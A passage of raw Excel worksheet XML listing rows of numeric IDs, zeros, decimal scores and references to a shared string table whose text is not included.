        <v>534</v>
      </c>
      <c r="H267" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A268" s="1">
        <v>266</v>
      </c>
      <c r="B268">
        <v>6024</v>
      </c>
      <c r="C268">
        <v>6024</v>
      </c>
      <c r="D268">
        <v>0</v>
      </c>
      <c r="E268">
        <v>0.39390000700950623</v>
      </c>
      <c r="F268" t="s">
        <v>7</v>
      </c>
      <c r="G268" t="s">
        <v>536</v>
      </c>
      <c r="H268" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A269" s="1">
        <v>267</v>
      </c>
      <c r="B269">
        <v>4454</v>
      </c>
      <c r="C269">
        <v>4454</v>
      </c>
      <c r="D269">
        <v>0</v>
      </c>
      <c r="E269">
        <v>0.67259997129440308</v>
      </c>
      <c r="F269" t="s">
        <v>7</v>
      </c>
      <c r="G269" t="s">
        <v>538</v>
      </c>
      <c r="H269" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A270" s="1">
        <v>268</v>
      </c>
      <c r="B270">
        <v>4452</v>
      </c>
      <c r="C270">
        <v>4452</v>
      </c>
      <c r="D270">
        <v>0</v>
      </c>
      <c r="E270">
        <v>0.52399998903274536</v>
      </c>
      <c r="F270" t="s">
        <v>7</v>
      </c>
      <c r="G270" t="s">
        <v>540</v>
      </c>
      <c r="H270" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A271" s="1">
        <v>269</v>
      </c>
      <c r="B271">
        <v>6974</v>
      </c>
      <c r="C271">
        <v>6974</v>
      </c>
      <c r="D271">
        <v>0</v>
      </c>
      <c r="E271">
        <v>0.63739997148513794</v>
      </c>
      <c r="F271" t="s">
        <v>7</v>
      </c>
      <c r="G271" t="s">
        <v>542</v>
      </c>
      <c r="H271" t="s">
        <v>543</v>
      </c>
    </row>
    <row r="272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A272" s="1">
        <v>270</v>
      </c>
      <c r="B272">
        <v>4443</v>
      </c>
      <c r="C272">
        <v>4443</v>
      </c>
      <c r="D272">
        <v>0</v>
      </c>
      <c r="E272">
        <v>0.71880000829696655</v>
      </c>
      <c r="F272" t="s">
        <v>7</v>
      </c>
      <c r="G272" t="s">
        <v>544</v>
      </c>
      <c r="H272" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A273" s="1">
        <v>271</v>
      </c>
      <c r="B273">
        <v>6973</v>
      </c>
      <c r="C273">
        <v>6973</v>
      </c>
      <c r="D273">
        <v>0</v>
      </c>
      <c r="E273">
        <v>0.56260001659393311</v>
      </c>
      <c r="F273" t="s">
        <v>7</v>
      </c>
      <c r="G273" t="s">
        <v>546</v>
      </c>
      <c r="H273" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A274" s="1">
        <v>272</v>
      </c>
      <c r="B274">
        <v>6970</v>
      </c>
      <c r="C274">
        <v>6970</v>
      </c>
      <c r="D274">
        <v>0</v>
      </c>
      <c r="E274">
        <v>0.44670000672340388</v>
      </c>
      <c r="F274" t="s">
        <v>7</v>
      </c>
      <c r="G274" t="s">
        <v>548</v>
      </c>
      <c r="H274" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A275" s="1">
        <v>273</v>
      </c>
      <c r="B275">
        <v>6969</v>
      </c>
      <c r="C275">
        <v>6969</v>
      </c>
      <c r="D275">
        <v>0</v>
      </c>
      <c r="E275">
        <v>0.767799973487854</v>
      </c>
      <c r="F275" t="s">
        <v>7</v>
      </c>
      <c r="G275" t="s">
        <v>550</v>
      </c>
      <c r="H275" t="s">
        <v>551</v>
      </c>
    </row>
    <row r="276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A276" s="1">
        <v>274</v>
      </c>
      <c r="B276">
        <v>6965</v>
      </c>
      <c r="C276">
        <v>6965</v>
      </c>
      <c r="D276">
        <v>0</v>
      </c>
      <c r="E276">
        <v>0.97979998588562012</v>
      </c>
      <c r="F276" t="s">
        <v>7</v>
      </c>
      <c r="G276" t="s">
        <v>552</v>
      </c>
      <c r="H276" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A277" s="1">
        <v>275</v>
      </c>
      <c r="B277">
        <v>2153</v>
      </c>
      <c r="C277">
        <v>2153</v>
      </c>
      <c r="D277">
        <v>0</v>
      </c>
      <c r="E277">
        <v>0.94980001449584961</v>
      </c>
      <c r="F277" t="s">
        <v>7</v>
      </c>
      <c r="G277" t="s">
        <v>554</v>
      </c>
      <c r="H277" t="s">
        <v>555</v>
      </c>
    </row>
    <row r="278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A278" s="1">
        <v>276</v>
      </c>
      <c r="B278">
        <v>2157</v>
      </c>
      <c r="C278">
        <v>2157</v>
      </c>
      <c r="D278">
        <v>0</v>
      </c>
      <c r="E278">
        <v>0.52420002222061157</v>
      </c>
      <c r="F278" t="s">
        <v>7</v>
      </c>
      <c r="G278" t="s">
        <v>556</v>
      </c>
      <c r="H278" t="s">
        <v>557</v>
      </c>
    </row>
    <row r="279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A279" s="1">
        <v>277</v>
      </c>
      <c r="B279">
        <v>2159</v>
      </c>
      <c r="C279">
        <v>2159</v>
      </c>
      <c r="D279">
        <v>0</v>
      </c>
      <c r="E279">
        <v>0.52219998836517334</v>
      </c>
      <c r="F279" t="s">
        <v>7</v>
      </c>
      <c r="G279" t="s">
        <v>558</v>
      </c>
      <c r="H279" t="s">
        <v>559</v>
      </c>
    </row>
    <row r="280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A280" s="1">
        <v>278</v>
      </c>
      <c r="B280">
        <v>2161</v>
      </c>
      <c r="C280">
        <v>2161</v>
      </c>
      <c r="D280">
        <v>0</v>
      </c>
      <c r="E280">
        <v>0.45350000262260443</v>
      </c>
      <c r="F280" t="s">
        <v>7</v>
      </c>
      <c r="G280" t="s">
        <v>560</v>
      </c>
      <c r="H280" t="s">
        <v>561</v>
      </c>
    </row>
    <row r="281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A281" s="1">
        <v>279</v>
      </c>
      <c r="B281">
        <v>6971</v>
      </c>
      <c r="C281">
        <v>6971</v>
      </c>
      <c r="D281">
        <v>0</v>
      </c>
      <c r="E281">
        <v>0.84350001811981201</v>
      </c>
      <c r="F281" t="s">
        <v>7</v>
      </c>
      <c r="G281" t="s">
        <v>562</v>
      </c>
      <c r="H281" t="s">
        <v>563</v>
      </c>
    </row>
    <row r="282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A282" s="1">
        <v>280</v>
      </c>
      <c r="B282">
        <v>6048</v>
      </c>
      <c r="C282">
        <v>6048</v>
      </c>
      <c r="D282">
        <v>0</v>
      </c>
      <c r="E282">
        <v>0.67809998989105225</v>
      </c>
      <c r="F282" t="s">
        <v>7</v>
      </c>
      <c r="G282" t="s">
        <v>564</v>
      </c>
      <c r="H282" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A283" s="1">
        <v>281</v>
      </c>
      <c r="B283">
        <v>4410</v>
      </c>
      <c r="C283">
        <v>4410</v>
      </c>
      <c r="D283">
        <v>0</v>
      </c>
      <c r="E283">
        <v>0.92919999361038208</v>
      </c>
      <c r="F283" t="s">
        <v>7</v>
      </c>
      <c r="G283" t="s">
        <v>565</v>
      </c>
      <c r="H283" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A284" s="1">
        <v>282</v>
      </c>
      <c r="B284">
        <v>6934</v>
      </c>
      <c r="C284">
        <v>6934</v>
      </c>
      <c r="D284">
        <v>0</v>
      </c>
      <c r="E284">
        <v>0.60759997367858887</v>
      </c>
      <c r="F284" t="s">
        <v>7</v>
      </c>
      <c r="G284" t="s">
        <v>567</v>
      </c>
      <c r="H284" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A285" s="1">
        <v>283</v>
      </c>
      <c r="B285">
        <v>2237</v>
      </c>
      <c r="C285">
        <v>2237</v>
      </c>
      <c r="D285">
        <v>0</v>
      </c>
      <c r="E285">
        <v>0.62080001831054688</v>
      </c>
      <c r="F285" t="s">
        <v>7</v>
      </c>
      <c r="G285" t="s">
        <v>569</v>
      </c>
      <c r="H285" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A286" s="1">
        <v>284</v>
      </c>
      <c r="B286">
        <v>2246</v>
      </c>
      <c r="C286">
        <v>2246</v>
      </c>
      <c r="D286">
        <v>0</v>
      </c>
      <c r="E286">
        <v>0.99730002880096436</v>
      </c>
      <c r="F286" t="s">
        <v>7</v>
      </c>
      <c r="G286" t="s">
        <v>571</v>
      </c>
      <c r="H286" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A287" s="1">
        <v>285</v>
      </c>
      <c r="B287">
        <v>6915</v>
      </c>
      <c r="C287">
        <v>6915</v>
      </c>
      <c r="D287">
        <v>0</v>
      </c>
      <c r="E287">
        <v>0.63899999856948853</v>
      </c>
      <c r="F287" t="s">
        <v>7</v>
      </c>
      <c r="G287" t="s">
        <v>573</v>
      </c>
      <c r="H287" t="s">
        <v>574</v>
      </c>
    </row>
    <row r="288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A288" s="1">
        <v>286</v>
      </c>
      <c r="B288">
        <v>2251</v>
      </c>
      <c r="C288">
        <v>2251</v>
      </c>
      <c r="D288">
        <v>0</v>
      </c>
      <c r="E288">
        <v>0.57920002937316895</v>
      </c>
      <c r="F288" t="s">
        <v>7</v>
      </c>
      <c r="G288" t="s">
        <v>575</v>
      </c>
      <c r="H288" t="s">
        <v>576</v>
      </c>
    </row>
    <row r="289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A289" s="1">
        <v>287</v>
      </c>
      <c r="B289">
        <v>6912</v>
      </c>
      <c r="C289">
        <v>6912</v>
      </c>
      <c r="D289">
        <v>0</v>
      </c>
      <c r="E289">
        <v>0.99750000238418579</v>
      </c>
      <c r="F289" t="s">
        <v>7</v>
      </c>
      <c r="G289" t="s">
        <v>577</v>
      </c>
      <c r="H289" t="s">
        <v>578</v>
      </c>
    </row>
    <row r="290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A290" s="1">
        <v>288</v>
      </c>
      <c r="B290">
        <v>2254</v>
      </c>
      <c r="C290">
        <v>2254</v>
      </c>
      <c r="D290">
        <v>0</v>
      </c>
      <c r="E290">
        <v>0.79850000143051147</v>
      </c>
      <c r="F290" t="s">
        <v>7</v>
      </c>
      <c r="G290" t="s">
        <v>579</v>
      </c>
      <c r="H290" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A291" s="1">
        <v>289</v>
      </c>
      <c r="B291">
        <v>2255</v>
      </c>
      <c r="C291">
        <v>2255</v>
      </c>
      <c r="D291">
        <v>0</v>
      </c>
      <c r="E291">
        <v>0.98760002851486206</v>
      </c>
      <c r="F291" t="s">
        <v>7</v>
      </c>
      <c r="G291" t="s">
        <v>581</v>
      </c>
      <c r="H291" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A292" s="1">
        <v>290</v>
      </c>
      <c r="B292">
        <v>2236</v>
      </c>
      <c r="C292">
        <v>2236</v>
      </c>
      <c r="D292">
        <v>0</v>
      </c>
      <c r="E292">
        <v>0.82160001993179321</v>
      </c>
      <c r="F292" t="s">
        <v>7</v>
      </c>
      <c r="G292" t="s">
        <v>583</v>
      </c>
      <c r="H292" t="s">
        <v>584</v>
      </c>
    </row>
    <row r="293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A293" s="1">
        <v>291</v>
      </c>
      <c r="B293">
        <v>6911</v>
      </c>
      <c r="C293">
        <v>6911</v>
      </c>
      <c r="D293">
        <v>0</v>
      </c>
      <c r="E293">
        <v>0.99690002202987671</v>
      </c>
      <c r="F293" t="s">
        <v>7</v>
      </c>
      <c r="G293" t="s">
        <v>585</v>
      </c>
      <c r="H293" t="s">
        <v>586</v>
      </c>
    </row>
    <row r="294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A294" s="1">
        <v>292</v>
      </c>
      <c r="B294">
        <v>2264</v>
      </c>
      <c r="C294">
        <v>2264</v>
      </c>
      <c r="D294">
        <v>0</v>
      </c>
      <c r="E294">
        <v>0.59219998121261597</v>
      </c>
      <c r="F294" t="s">
        <v>7</v>
      </c>
      <c r="G294" t="s">
        <v>587</v>
      </c>
      <c r="H294" t="s">
        <v>588</v>
      </c>
    </row>
    <row r="295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A295" s="1">
        <v>293</v>
      </c>
      <c r="B295">
        <v>2265</v>
      </c>
      <c r="C295">
        <v>2265</v>
      </c>
      <c r="D295">
        <v>0</v>
      </c>
      <c r="E295">
        <v>0.4154999852180481</v>
      </c>
      <c r="F295" t="s">
        <v>7</v>
      </c>
      <c r="G295" t="s">
        <v>589</v>
      </c>
      <c r="H295" t="s">
        <v>590</v>
      </c>
    </row>
    <row r="296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A296" s="1">
        <v>294</v>
      </c>
      <c r="B296">
        <v>2266</v>
      </c>
      <c r="C296">
        <v>2266</v>
      </c>
      <c r="D296">
        <v>0</v>
      </c>
      <c r="E296">
        <v>0.98640000820159912</v>
      </c>
      <c r="F296" t="s">
        <v>7</v>
      </c>
      <c r="G296" t="s">
        <v>591</v>
      </c>
      <c r="H296" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A297" s="1">
        <v>295</v>
      </c>
      <c r="B297">
        <v>2267</v>
      </c>
      <c r="C297">
        <v>2267</v>
      </c>
      <c r="D297">
        <v>0</v>
      </c>
      <c r="E297">
        <v>0.98640000820159912</v>
      </c>
      <c r="F297" t="s">
        <v>7</v>
      </c>
      <c r="G297" t="s">
        <v>593</v>
      </c>
      <c r="H297" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A298" s="1">
        <v>296</v>
      </c>
      <c r="B298">
        <v>6058</v>
      </c>
      <c r="C298">
        <v>6058</v>
      </c>
      <c r="D298">
        <v>0</v>
      </c>
      <c r="E298">
        <v>0.91039997339248657</v>
      </c>
      <c r="F298" t="s">
        <v>7</v>
      </c>
      <c r="G298" t="s">
        <v>594</v>
      </c>
      <c r="H298" t="s">
        <v>595</v>
      </c>
    </row>
    <row r="299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A299" s="1">
        <v>297</v>
      </c>
      <c r="B299">
        <v>6059</v>
      </c>
      <c r="C299">
        <v>6059</v>
      </c>
      <c r="D299">
        <v>0</v>
      </c>
      <c r="E299">
        <v>0.6679999828338623</v>
      </c>
      <c r="F299" t="s">
        <v>7</v>
      </c>
      <c r="G299" t="s">
        <v>596</v>
      </c>
      <c r="H299" t="s">
        <v>597</v>
      </c>
    </row>
    <row r="300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A300" s="1">
        <v>298</v>
      </c>
      <c r="B300">
        <v>6903</v>
      </c>
      <c r="C300">
        <v>6903</v>
      </c>
      <c r="D300">
        <v>0</v>
      </c>
      <c r="E300">
        <v>0.5812000036239624</v>
      </c>
      <c r="F300" t="s">
        <v>7</v>
      </c>
      <c r="G300" t="s">
        <v>598</v>
      </c>
      <c r="H300" t="s">
        <v>599</v>
      </c>
    </row>
    <row r="301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A301" s="1">
        <v>299</v>
      </c>
      <c r="B301">
        <v>2260</v>
      </c>
      <c r="C301">
        <v>2260</v>
      </c>
      <c r="D301">
        <v>0</v>
      </c>
      <c r="E301">
        <v>0.67350000143051147</v>
      </c>
      <c r="F301" t="s">
        <v>7</v>
      </c>
      <c r="G301" t="s">
        <v>600</v>
      </c>
      <c r="H301" t="s">
        <v>601</v>
      </c>
    </row>
    <row r="302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A302" s="1">
        <v>300</v>
      </c>
      <c r="B302">
        <v>2235</v>
      </c>
      <c r="C302">
        <v>2235</v>
      </c>
      <c r="D302">
        <v>0</v>
      </c>
      <c r="E302">
        <v>0.47450000047683721</v>
      </c>
      <c r="F302" t="s">
        <v>7</v>
      </c>
      <c r="G302" t="s">
        <v>602</v>
      </c>
      <c r="H302" t="s">
        <v>603</v>
      </c>
    </row>
    <row r="303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A303" s="1">
        <v>301</v>
      </c>
      <c r="B303">
        <v>6926</v>
      </c>
      <c r="C303">
        <v>6926</v>
      </c>
      <c r="D303">
        <v>0</v>
      </c>
      <c r="E303">
        <v>0.79820001125335693</v>
      </c>
      <c r="F303" t="s">
        <v>7</v>
      </c>
      <c r="G303" t="s">
        <v>604</v>
      </c>
      <c r="H303" t="s">
        <v>605</v>
      </c>
    </row>
    <row r="304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A304" s="1">
        <v>302</v>
      </c>
      <c r="B304">
        <v>2231</v>
      </c>
      <c r="C304">
        <v>2231</v>
      </c>
      <c r="D304">
        <v>0</v>
      </c>
      <c r="E304">
        <v>0.86449998617172241</v>
      </c>
      <c r="F304" t="s">
        <v>7</v>
      </c>
      <c r="G304" t="s">
        <v>606</v>
      </c>
      <c r="H304" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A305" s="1">
        <v>303</v>
      </c>
      <c r="B305">
        <v>6933</v>
      </c>
      <c r="C305">
        <v>6933</v>
      </c>
      <c r="D305">
        <v>0</v>
      </c>
      <c r="E305">
        <v>0.68409997224807739</v>
      </c>
      <c r="F305" t="s">
        <v>7</v>
      </c>
      <c r="G305" t="s">
        <v>608</v>
      </c>
      <c r="H305" t="s">
        <v>609</v>
      </c>
    </row>
    <row r="306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A306" s="1">
        <v>304</v>
      </c>
      <c r="B306">
        <v>6049</v>
      </c>
      <c r="C306">
        <v>6049</v>
      </c>
      <c r="D306">
        <v>0</v>
      </c>
      <c r="E306">
        <v>0.80339998006820679</v>
      </c>
      <c r="F306" t="s">
        <v>7</v>
      </c>
      <c r="G306" t="s">
        <v>610</v>
      </c>
      <c r="H306" t="s">
        <v>611</v>
      </c>
    </row>
    <row r="307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A307" s="1">
        <v>305</v>
      </c>
      <c r="B307">
        <v>2207</v>
      </c>
      <c r="C307">
        <v>2207</v>
      </c>
      <c r="D307">
        <v>0</v>
      </c>
      <c r="E307">
        <v>0.71939998865127563</v>
      </c>
      <c r="F307" t="s">
        <v>7</v>
      </c>
      <c r="G307" t="s">
        <v>612</v>
      </c>
      <c r="H307" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A308" s="1">
        <v>306</v>
      </c>
      <c r="B308">
        <v>6050</v>
      </c>
      <c r="C308">
        <v>6050</v>
      </c>
      <c r="D308">
        <v>0</v>
      </c>
      <c r="E308">
        <v>0.62470000982284546</v>
      </c>
      <c r="F308" t="s">
        <v>7</v>
      </c>
      <c r="G308" t="s">
        <v>614</v>
      </c>
      <c r="H308" t="s">
        <v>615</v>
      </c>
    </row>
    <row r="309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A309" s="1">
        <v>307</v>
      </c>
      <c r="B309">
        <v>4407</v>
      </c>
      <c r="C309">
        <v>4407</v>
      </c>
      <c r="D309">
        <v>0</v>
      </c>
      <c r="E309">
        <v>0.41150000691413879</v>
      </c>
      <c r="F309" t="s">
        <v>7</v>
      </c>
      <c r="G309" t="s">
        <v>616</v>
      </c>
      <c r="H309" t="s">
        <v>617</v>
      </c>
    </row>
    <row r="310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A310" s="1">
        <v>308</v>
      </c>
      <c r="B310">
        <v>6932</v>
      </c>
      <c r="C310">
        <v>6932</v>
      </c>
      <c r="D310">
        <v>0</v>
      </c>
      <c r="E310">
        <v>0.56419998407363892</v>
      </c>
      <c r="F310" t="s">
        <v>7</v>
      </c>
      <c r="G310" t="s">
        <v>618</v>
      </c>
      <c r="H310" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A311" s="1">
        <v>309</v>
      </c>
      <c r="B311">
        <v>4406</v>
      </c>
      <c r="C311">
        <v>4406</v>
      </c>
      <c r="D311">
        <v>0</v>
      </c>
      <c r="E311">
        <v>0.40599998831748962</v>
      </c>
      <c r="F311" t="s">
        <v>7</v>
      </c>
      <c r="G311" t="s">
        <v>620</v>
      </c>
      <c r="H311" t="s">
        <v>621</v>
      </c>
    </row>
    <row r="312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A312" s="1">
        <v>310</v>
      </c>
      <c r="B312">
        <v>2212</v>
      </c>
      <c r="C312">
        <v>2212</v>
      </c>
      <c r="D312">
        <v>0</v>
      </c>
      <c r="E312">
        <v>0.82050001621246338</v>
      </c>
      <c r="F312" t="s">
        <v>7</v>
      </c>
      <c r="G312" t="s">
        <v>622</v>
      </c>
      <c r="H312" t="s">
        <v>623</v>
      </c>
    </row>
    <row r="313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A313" s="1">
        <v>311</v>
      </c>
      <c r="B313">
        <v>6931</v>
      </c>
      <c r="C313">
        <v>6931</v>
      </c>
      <c r="D313">
        <v>0</v>
      </c>
      <c r="E313">
        <v>0.74989998340606689</v>
      </c>
      <c r="F313" t="s">
        <v>7</v>
      </c>
      <c r="G313" t="s">
        <v>624</v>
      </c>
      <c r="H313" t="s">
        <v>625</v>
      </c>
    </row>
    <row r="314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A314" s="1">
        <v>312</v>
      </c>
      <c r="B314">
        <v>4405</v>
      </c>
      <c r="C314">
        <v>4405</v>
      </c>
      <c r="D314">
        <v>0</v>
      </c>
      <c r="E314">
        <v>0.90359997749328613</v>
      </c>
      <c r="F314" t="s">
        <v>7</v>
      </c>
      <c r="G314" t="s">
        <v>626</v>
      </c>
      <c r="H314" t="s">
        <v>627</v>
      </c>
    </row>
    <row r="315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A315" s="1">
        <v>313</v>
      </c>
      <c r="B315">
        <v>6051</v>
      </c>
      <c r="C315">
        <v>6051</v>
      </c>
      <c r="D315">
        <v>0</v>
      </c>
      <c r="E315">
        <v>0.99479997158050537</v>
      </c>
      <c r="F315" t="s">
        <v>7</v>
      </c>
      <c r="G315" t="s">
        <v>628</v>
      </c>
      <c r="H315" t="s">
        <v>629</v>
      </c>
    </row>
    <row r="316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A316" s="1">
        <v>314</v>
      </c>
      <c r="B316">
        <v>2217</v>
      </c>
      <c r="C316">
        <v>2217</v>
      </c>
      <c r="D316">
        <v>0</v>
      </c>
      <c r="E316">
        <v>0.7192000150680542</v>
      </c>
      <c r="F316" t="s">
        <v>7</v>
      </c>
      <c r="G316" t="s">
        <v>630</v>
      </c>
      <c r="H316" t="s">
        <v>631</v>
      </c>
    </row>
    <row r="317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A317" s="1">
        <v>315</v>
      </c>
      <c r="B317">
        <v>6053</v>
      </c>
      <c r="C317">
        <v>6053</v>
      </c>
      <c r="D317">
        <v>0</v>
      </c>
      <c r="E317">
        <v>0.99159997701644897</v>
      </c>
      <c r="F317" t="s">
        <v>7</v>
      </c>
      <c r="G317" t="s">
        <v>632</v>
      </c>
      <c r="H317" t="s">
        <v>633</v>
      </c>
    </row>
    <row r="318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A318" s="1">
        <v>316</v>
      </c>
      <c r="B318">
        <v>2220</v>
      </c>
      <c r="C318">
        <v>2220</v>
      </c>
      <c r="D318">
        <v>0</v>
      </c>
      <c r="E318">
        <v>0.64300000667572021</v>
      </c>
      <c r="F318" t="s">
        <v>7</v>
      </c>
      <c r="G318" t="s">
        <v>634</v>
      </c>
      <c r="H318" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A319" s="1">
        <v>317</v>
      </c>
      <c r="B319">
        <v>2221</v>
      </c>
      <c r="C319">
        <v>2221</v>
      </c>
      <c r="D319">
        <v>0</v>
      </c>
      <c r="E319">
        <v>0.51099997758865356</v>
      </c>
      <c r="F319" t="s">
        <v>7</v>
      </c>
      <c r="G319" t="s">
        <v>636</v>
      </c>
      <c r="H319" t="s">
        <v>637</v>
      </c>
    </row>
    <row r="320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A320" s="1">
        <v>318</v>
      </c>
      <c r="B320">
        <v>4400</v>
      </c>
      <c r="C320">
        <v>4400</v>
      </c>
      <c r="D320">
        <v>0</v>
      </c>
      <c r="E320">
        <v>0.62139999866485596</v>
      </c>
      <c r="F320" t="s">
        <v>7</v>
      </c>
      <c r="G320" t="s">
        <v>638</v>
      </c>
      <c r="H320" t="s">
        <v>639</v>
      </c>
    </row>
    <row r="321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A321" s="1">
        <v>319</v>
      </c>
      <c r="B321">
        <v>2229</v>
      </c>
      <c r="C321">
        <v>2229</v>
      </c>
      <c r="D321">
        <v>0</v>
      </c>
      <c r="E321">
        <v>0.81679999828338623</v>
      </c>
      <c r="F321" t="s">
        <v>7</v>
      </c>
      <c r="G321" t="s">
        <v>640</v>
      </c>
      <c r="H321" t="s">
        <v>641</v>
      </c>
    </row>
    <row r="322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A322" s="1">
        <v>320</v>
      </c>
      <c r="B322">
        <v>2275</v>
      </c>
      <c r="C322">
        <v>2275</v>
      </c>
      <c r="D322">
        <v>0</v>
      </c>
      <c r="E322">
        <v>0.68800002336502075</v>
      </c>
      <c r="F322" t="s">
        <v>7</v>
      </c>
      <c r="G322" t="s">
        <v>642</v>
      </c>
      <c r="H322" t="s">
        <v>643</v>
      </c>
    </row>
    <row r="323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A323" s="1">
        <v>321</v>
      </c>
      <c r="B323">
        <v>1835</v>
      </c>
      <c r="C323">
        <v>1835</v>
      </c>
      <c r="D323">
        <v>0</v>
      </c>
      <c r="E323">
        <v>0.45070001482963562</v>
      </c>
      <c r="F323" t="s">
        <v>7</v>
      </c>
      <c r="G323" t="s">
        <v>644</v>
      </c>
      <c r="H323" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A324" s="1">
        <v>322</v>
      </c>
      <c r="B324">
        <v>1834</v>
      </c>
      <c r="C324">
        <v>1834</v>
      </c>
      <c r="D324">
        <v>0</v>
      </c>
      <c r="E324">
        <v>0.60589998960494995</v>
      </c>
      <c r="F324" t="s">
        <v>7</v>
      </c>
      <c r="G324" t="s">
        <v>646</v>
      </c>
      <c r="H324" t="s">
        <v>647</v>
      </c>
    </row>
    <row r="325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A325" s="1">
        <v>323</v>
      </c>
      <c r="B325">
        <v>1833</v>
      </c>
      <c r="C325">
        <v>1833</v>
      </c>
      <c r="D325">
        <v>0</v>
      </c>
      <c r="E325">
        <v>0.85269999504089355</v>
      </c>
      <c r="F325" t="s">
        <v>7</v>
      </c>
      <c r="G325" t="s">
        <v>648</v>
      </c>
      <c r="H325" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A326" s="1">
        <v>324</v>
      </c>
      <c r="B326">
        <v>4764</v>
      </c>
      <c r="C326">
        <v>4764</v>
      </c>
      <c r="D326">
        <v>0</v>
      </c>
      <c r="E326">
        <v>0.99750000238418579</v>
      </c>
      <c r="F326" t="s">
        <v>7</v>
      </c>
      <c r="G326" t="s">
        <v>650</v>
      </c>
      <c r="H326" t="s">
        <v>651</v>
      </c>
    </row>
    <row r="327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A327" s="1">
        <v>325</v>
      </c>
      <c r="B327">
        <v>1490</v>
      </c>
      <c r="C327">
        <v>1490</v>
      </c>
      <c r="D327">
        <v>0</v>
      </c>
      <c r="E327">
        <v>0.74409997463226318</v>
      </c>
      <c r="F327" t="s">
        <v>7</v>
      </c>
      <c r="G327" t="s">
        <v>652</v>
      </c>
      <c r="H327" t="s">
        <v>653</v>
      </c>
    </row>
    <row r="328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A328" s="1">
        <v>326</v>
      </c>
      <c r="B328">
        <v>4762</v>
      </c>
      <c r="C328">
        <v>4762</v>
      </c>
      <c r="D328">
        <v>0</v>
      </c>
      <c r="E328">
        <v>0.99580001831054688</v>
      </c>
      <c r="F328" t="s">
        <v>7</v>
      </c>
      <c r="G328" t="s">
        <v>654</v>
      </c>
      <c r="H328" t="s">
        <v>655</v>
      </c>
    </row>
    <row r="329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A329" s="1">
        <v>327</v>
      </c>
      <c r="B329">
